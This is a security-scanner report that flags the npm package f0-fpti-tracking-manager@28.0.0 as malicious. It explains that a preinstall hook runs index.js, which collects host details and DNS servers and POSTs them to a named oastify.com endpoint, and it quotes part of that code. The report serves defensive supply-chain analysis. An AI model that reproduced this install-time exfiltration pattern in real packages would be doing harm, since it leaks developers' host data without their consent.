---
canonical: "https://firewall.lpm.dev/npm/f0-fpti-tracking-manager/v/28.0.0"
markdown: "https://firewall.lpm.dev/npm/f0-fpti-tracking-manager/v/28.0.0.md"
package: "f0-fpti-tracking-manager"
report_status: "published"
title: "f0-fpti-tracking-manager@28.0.0 npm security report"
verdict: "malicious"
version: "28.0.0"
---

# f0-fpti-tracking-manager@28.0.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Exposes host identity, home-directory path, and configured DNS servers to a third party.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Credential Exfiltration
- **Selected version:** 28.0.0
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Installing the package triggers host-fingerprint collection and outbound exfiltration before installation completes. The nested archive repeats the same behavior.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Verdict:** Malicious
- **Confidence:** 99.0%
- **Started:** 2026-07-26T17:41:45.898Z
- **Finished:** 2026-07-26T17:42:03.081Z
- **Download time:** 255 ms
- **Static scan time:** 6 ms
- **AI review time:** 16922 ms
- **Total time:** 17183 ms

## Security analysis

### Published attack-surface review

- **Summary:** Installing the package triggers host-fingerprint collection and outbound exfiltration before installation completes. The nested archive repeats the same behavior.

- **Trigger:** npm preinstall during package installation

- **Impact:** Exposes host identity, home-directory path, and configured DNS servers to a third party.

- **Evidence paths:** package.json, index.js, f0-fpti-tracking-manager-28.0.0.tgz

- **Review source:** ai\_review

- **Reviewed:** 2026-07-26T17:42:03.081Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** preinstall host fingerprinting and HTTPS exfiltration

- **Attack narrative:** On installation, the preinstall hook executes index.js. It gathers local host metadata and DNS configuration, then POSTs it to an external OAST domain. The package’s own description identifies a dependency-confusion proof of concept, and its included archive repeats the code.

- **Rationale:** This is concrete, unconsented install-time collection and exfiltration of local host data to an unrelated external endpoint.

- **Files touched:** package.json, index.js, f0-fpti-tracking-manager-28.0.0.tgz

- **Network endpoints:** gzj3hokp9obe68j49uaui8anfel690xp.oastify.com/hit

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for:** package.json runs \`node index.js\` in preinstall., index.js collects hostname, platform, architecture, home directory, and DNS servers., index.js POSTs the collected host data to an OAST endpoint., package.json describes the package as a dependency-confusion proof of concept., Nested archive contains the same preinstall exfiltration code.

- **Evidence against:** No shell execution, payload download, or file modification was found.

## Public findings

### 1. High: Install Time Lifecycle Scripts
- **Category:** Manifest
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/f0-fpti-tracking-manager@28.0.0/package.json>)

Package defines install-time lifecycle scripts.

Public source snippet (untrusted):

```json
scripts.preinstall = node index.js
```

### 2. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 3. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 4. High: Host Fingerprint Exfiltration
- **Category:** Source
- **Confidence:** 86.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/f0-fpti-tracking-manager@28.0.0/index.js>)

Source collects local host identity data and sends it to an external endpoint.

Public source snippet (untrusted):

```javascript
L1: const https = require("https");
L2: const os = require("os");
L3: const dns = require("dns");
L4: 
L5: const data = JSON.stringify({
L6: hostname: os.hostname(),
L7: platform: os.platform(),
...
L26: 
L27: req.write(data);
L28: req.end();
```

### 5. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 6. Medium: Ships Compressed Blob
- **Category:** Artifact Inventory
- **Confidence:** 70.0%
- **Path:** f0-fpti-tracking-manager-28.0.0.tgz
- **Public source:** [View source](<https://unpkg.com/f0-fpti-tracking-manager@28.0.0/f0-fpti-tracking-manager-28.0.0.tgz>)

Package ships compressed or archive-like blobs.

Public source snippet (untrusted):

```text
path = f0-fpti-tracking-manager-28.0.0.tgz
kind = compressed_blob
sizeBytes = 1225
magicHex = [redacted]
```

### 7. Low: Nested Archive Needs Inspection
- **Category:** Artifact Inventory
- **Confidence:** 80.0%
- **Path:** f0-fpti-tracking-manager-28.0.0.tgz
- **Public source:** [View source](<https://unpkg.com/f0-fpti-tracking-manager@28.0.0/f0-fpti-tracking-manager-28.0.0.tgz>)

Package ships a nested archive or MCP bundle that was inventoried but not recursively analyzed.

Public source snippet (untrusted):

```text
path = f0-fpti-tracking-manager-28.0.0.tgz
kind = nested_archive_needs_inspection
sizeBytes = 1225
magicHex = [redacted]
```

### 8. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 80.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 9. Low: No License
- **Category:** Manifest
- **Confidence:** 80.0%

Package manifest does not declare a clear license.

## Dependencies and install lifecycle
- **Lifecycle scripts present:** Yes
- **Published lifecycle scripts:** preinstall
- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** f0-fpti-tracking-manager
- **Ecosystem:** npm
- **Version:** 28.0.0
- **Version published:** 2026-07-25T09:19:17.389Z
- **Package first seen:** 2026-07-25T10:15:05.373Z
- **Package last seen:** 2026-07-26T17:42:03.081Z
- **Known versions:** 2
- **Latest version:** 28.0.0
- **Appeal under review:** No
- **Description:** Dependency confusion proof of concept package
- **Artifact files:** 3
- **Artifact unpacked size:** 1,972 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/f0-fpti-tracking-manager/v/28.0.0>)
- [OSV advisory](<https://osv.dev/vulnerability/MAL-2023-8293>)
- [ADVISORY](<https://github.com/advisories/GHSA-jm7g-qcj6-qcrj>)
- [PACKAGE](<https://www.npmjs.com/package/f0-fpti-tracking-manager/v/28.0.0>)
